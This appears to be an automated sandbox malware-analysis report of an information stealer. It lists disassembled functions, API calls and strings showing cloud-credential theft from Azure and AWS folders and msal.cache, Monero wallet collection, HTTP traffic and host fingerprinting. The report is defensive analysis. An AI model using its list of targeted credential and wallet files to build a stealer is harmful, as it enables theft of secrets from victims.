Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?$Po
API String ID: 3246050789-17732920
Opcode ID: 46375cf0256429d3fd0f7637d42549b3b0ee8fd5f2060d75db8f2f682bc1403b
Instruction ID: c310345c30f9e9d7734b41571f9ad014d2e905d43fce03d412ea4030076ee267
Opcode Fuzzy Hash: 46375cf0256429d3fd0f7637d42549b3b0ee8fd5f2060d75db8f2f682bc1403b
Instruction Fuzzy Hash: CF810BB1910218ABDB24DB50CC95FEAB7B8FF88700F008699F14AA7180DF756B85CF95

Function 00935510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009356A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935857

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935228

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 009352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935318
Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 0093532F
Part of subcall function 009352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00935364
Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 00935383
Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 009353AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0093578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935A0C
Sleep.KERNEL32(0000EA60), ref: 00935A1B

Strings

ERROR, xrefs: 009359FE
ERROR, xrefs: 0093577D
ERROR, xrefs: 00935636
ERROR, xrefs: 00935932
Nn, xrefs: 00935585, 009355E3
ERROR, xrefs: 00935693
ERROR, xrefs: 00935849

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: Nn$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-32119525
Opcode ID: 76610699a5a18742186431c6ea7e7c3677e038ad304ba8e1002c625b8010df00
Instruction ID: 42e8ba15192b47e01c912cad2ccf943d16a1f0f7760a2ed9f8815f90c3d439ee
Opcode Fuzzy Hash: 76610699a5a18742186431c6ea7e7c3677e038ad304ba8e1002c625b8010df00
Instruction Fuzzy Hash: 3FE1FB72910104AACB14FBA0EC96FED7379AFD4300F508568F547A7195EF74AA09CFA2

Function 00926280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
StrCmpCA.SHLWAPI(?,006FE9D8), ref: 00926303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
HttpOpenRequestA.WININET(00000000,GET,?,006FE400,00000000,00000000,00400100,00000000), ref: 00926385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009263FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0092646D
InternetCloseHandle.WININET(00000000), ref: 009264EF
InternetCloseHandle.WININET(00000000), ref: 009264F9
InternetCloseHandle.WININET(00000000), ref: 00926503

Strings

ERROR, xrefs: 009264C9
ERROR, xrefs: 00926407
GET, xrefs: 0092637C

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: aeca0d2367a378c02db47b1589c08e09816c09353824f0cd55046afb6ed7c139
Instruction ID: 6f101d75e2b397e85bab288f262666e1ff9c2fe0625489cd3ba8f4cc62909582
Opcode Fuzzy Hash: aeca0d2367a378c02db47b1589c08e09816c09353824f0cd55046afb6ed7c139
Instruction Fuzzy Hash: 6A712D71A00218ABDF24EFA0DC49FEEB778BB44700F108198F50A6B5D4DBB46A85CF52

Function 00934D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

lstrcat.KERNEL32(?,00000000), ref: 00934DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00934DCD

Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943

lstrcat.KERNEL32(?,00000000), ref: 00934E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00934E59

Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92

lstrcat.KERNEL32(?,00000000), ref: 00934EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00934EE5

Part of subcall function 00934910: wsprintfA.USER32 ref: 009349B0
Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,009408D2), ref: 009349C5
Part of subcall function 00934910: wsprintfA.USER32 ref: 009349E2
Part of subcall function 00934910: PathMatchSpecA.SHLWAPI(?,?), ref: 00934A1E
Part of subcall function 00934910: lstrcat.KERNEL32(?,006FEA18), ref: 00934A4A
Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FF8), ref: 00934A5C
Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A70
Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FFC), ref: 00934A82
Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A96
Part of subcall function 00934910: CopyFileA.KERNEL32(?,?,00000001), ref: 00934AAC
Part of subcall function 00934910: DeleteFileA.KERNEL32(?), ref: 00934B31

Strings

\.aws\, xrefs: 00934E4D
\.IdentityService\, xrefs: 00934ED9
\.azure\, xrefs: 00934DC1
msal.cache, xrefs: 00934EF0
Azure\.IdentityService, xrefs: 00934EEB
Azure\.azure, xrefs: 00934DD3
*.*, xrefs: 00934DD8
Azure\.aws, xrefs: 00934E5F
*.*, xrefs: 00934E64

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: e8ac26e442dc1de054ce56a5a0e4d530c707842f5ad785b5b371854733721b98
Instruction ID: af467c023703a7f5387e7a888562d15d9a1ebd0a205876ed3c88ff9327cb683f
Opcode Fuzzy Hash: e8ac26e442dc1de054ce56a5a0e4d530c707842f5ad785b5b371854733721b98
Instruction Fuzzy Hash: 444196BA94020467DB10F770EC97FED7338ABA4704F004594B689660C1EEB5ABC9CF92

Function 00931A10 Relevance: 16.6, APIs: 2, Strings: 7, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 00937500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00937542
Part of subcall function 00937500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093757F
Part of subcall function 00937500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937603
Part of subcall function 00937500: RtlAllocateHeap.NTDLL(00000000), ref: 0093760A

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 00937690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009376A4
Part of subcall function 00937690: RtlAllocateHeap.NTDLL(00000000), ref: 009376AB

Part of subcall function 009377C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0093DBC0,000000FF,?,00931C99,00000000,?,006FDE10,00000000,?), ref: 009377F2
Part of subcall function 009377C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0093DBC0,000000FF,?,00931C99,00000000,?,006FDE10,00000000,?), ref: 009377F9

Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F

Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F

Part of subcall function 00937980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E00,00000000,?), ref: 009379B0
Part of subcall function 00937980: RtlAllocateHeap.NTDLL(00000000), ref: 009379B7
Part of subcall function 00937980: GetLocalTime.KERNEL32(?,?,?,?,?,00940E00,00000000,?), ref: 009379C4
Part of subcall function 00937980: wsprintfA.USER32 ref: 009379F3

Part of subcall function 00937A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006FE568,00000000,?,00940E10,00000000,?,00000000,00000000), ref: 00937A63
Part of subcall function 00937A30: RtlAllocateHeap.NTDLL(00000000), ref: 00937A6A
Part of subcall function 00937A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006FE568,00000000,?,00940E10,00000000,?,00000000,00000000,?), ref: 00937A7D

Part of subcall function 00937B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,006FE568,00000000,?,00940E10,00000000,?,00000000,00000000), ref: 00937B35

Part of subcall function 00937B90: GetKeyboardLayoutList.USER32(00000000,00000000,009405AF), ref: 00937BE1
Part of subcall function 00937B90: LocalAlloc.KERNEL32(00000040,?), ref: 00937BF9
Part of subcall function 00937B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00937C0D
Part of subcall function 00937B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00937C62
Part of subcall function 00937B90: LocalFree.KERNEL32(00000000), ref: 00937D22

Part of subcall function 00937D80: GetSystemPowerStatus.KERNEL32(?), ref: 00937DAD

GetCurrentProcessId.KERNEL32(00000000,?,006FDBB0,00000000,?,00940E24,00000000,?,00000000,00000000,?,006FE700,00000000,?,00940E20,00000000), ref: 0093207E

Part of subcall function 00939470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00939484
Part of subcall function 00939470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 009394A5
Part of subcall function 00939470: CloseHandle.KERNEL32(00000000), ref: 009394AF

Part of subcall function 00937E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937E37
Part of subcall function 00937E00: RtlAllocateHeap.NTDLL(00000000), ref: 00937E3E
Part of subcall function 00937E00: RegOpenKeyExA.KERNEL32(80000002,006EBF08,00000000,00020119,?), ref: 00937E5E
Part of subcall function 00937E00: RegQueryValueExA.KERNEL32(?,006FDC70,00000000,00000000,000000FF,000000FF), ref: 00937E7F
Part of subcall function 00937E00: RegCloseKey.ADVAPI32(?), ref: 00937E92

Part of subcall function 00937F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00937FC9
Part of subcall function 00937F60: GetLastError.KERNEL32 ref: 00937FD8

Part of subcall function 00937ED0: GetSystemInfo.KERNEL32(00940E2C), ref: 00937F00
Part of subcall function 00937ED0: wsprintfA.USER32 ref: 00937F16

Part of subcall function 00938100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006FE5E0,00000000,?,00940E2C,00000000,?,00000000), ref: 00938130
Part of subcall function 00938100: RtlAllocateHeap.NTDLL(00000000), ref: 00938137
Part of subcall function 00938100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00938158
Part of subcall function 00938100: wsprintfA.USER32 ref: 009381AC

Part of subcall function 009387C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E28,00000000,?), ref: 0093882F
Part of subcall function 009387C0: RtlAllocateHeap.NTDLL(00000000), ref: 00938836
Part of subcall function 009387C0: wsprintfA.USER32 ref: 00938850

Part of subcall function 00938320: RegOpenKeyExA.KERNEL32(00000000,006FB778,00000000,00020019,00000000,009405B6), ref: 009383A4

Part of subcall function 00938320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
Part of subcall function 00938320: wsprintfA.USER32 ref: 00938459
Part of subcall function 00938320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0093847B
Part of subcall function 00938320: RegCloseKey.ADVAPI32(00000000), ref: 0093848C
Part of subcall function 00938320: RegCloseKey.ADVAPI32(00000000), ref: 00938499

Part of subcall function 00938680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009405B7), ref: 009386CA
Part of subcall function 00938680: Process32First.KERNEL32(?,00000128), ref: 009386DE
Part of subcall function 00938680: Process32Next.KERNEL32(?,00000128), ref: 009386F3
Part of subcall function 00938680: CloseHandle.KERNEL32(?), ref: 00938761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0093265B

Strings

Xo, xrefs: 00932498
(o, xrefs: 00932446
Xo, xrefs: 00931B60
o, xrefs: 00931A8E
o, xrefs: 00932165
ho, xrefs: 00931DDA
(o, xrefs: 00931F4A

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: (o$(o$Xo$Xo$ho$o$o
API String ID: 60318822-20627222
Opcode ID: 7c52d28f3cda4e378e3d8b97794602a78dcca3970d1b78ed9cd9d7f1039ecbeb
Instruction ID: d2a977b638ed5b692bb303ad5793b1436b1ecfa684f84abd23ead56092866e01
Opcode Fuzzy Hash: 7c52d28f3cda4e378e3d8b97794602a78dcca3970d1b78ed9cd9d7f1039ecbeb
Instruction Fuzzy Hash: 75721C72C14118AADB19FB90DC92FEEB37CAF94300F5142A9B55672091EF702B49CF66

Function 00921310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009212B4
Part of subcall function 009212A0: RtlAllocateHeap.NTDLL(00000000), ref: 009212BB
Part of subcall function 009212A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009212D7
Part of subcall function 009212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009212F5
Part of subcall function 009212A0: RegCloseKey.ADVAPI32(?), ref: 009212FF

lstrcat.KERNEL32(?,00000000), ref: 0092134F
lstrlen.KERNEL32(?), ref: 0092135C
lstrcat.KERNEL32(?,.keys), ref: 00921377

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,006FA970,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 00938B86

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00921465

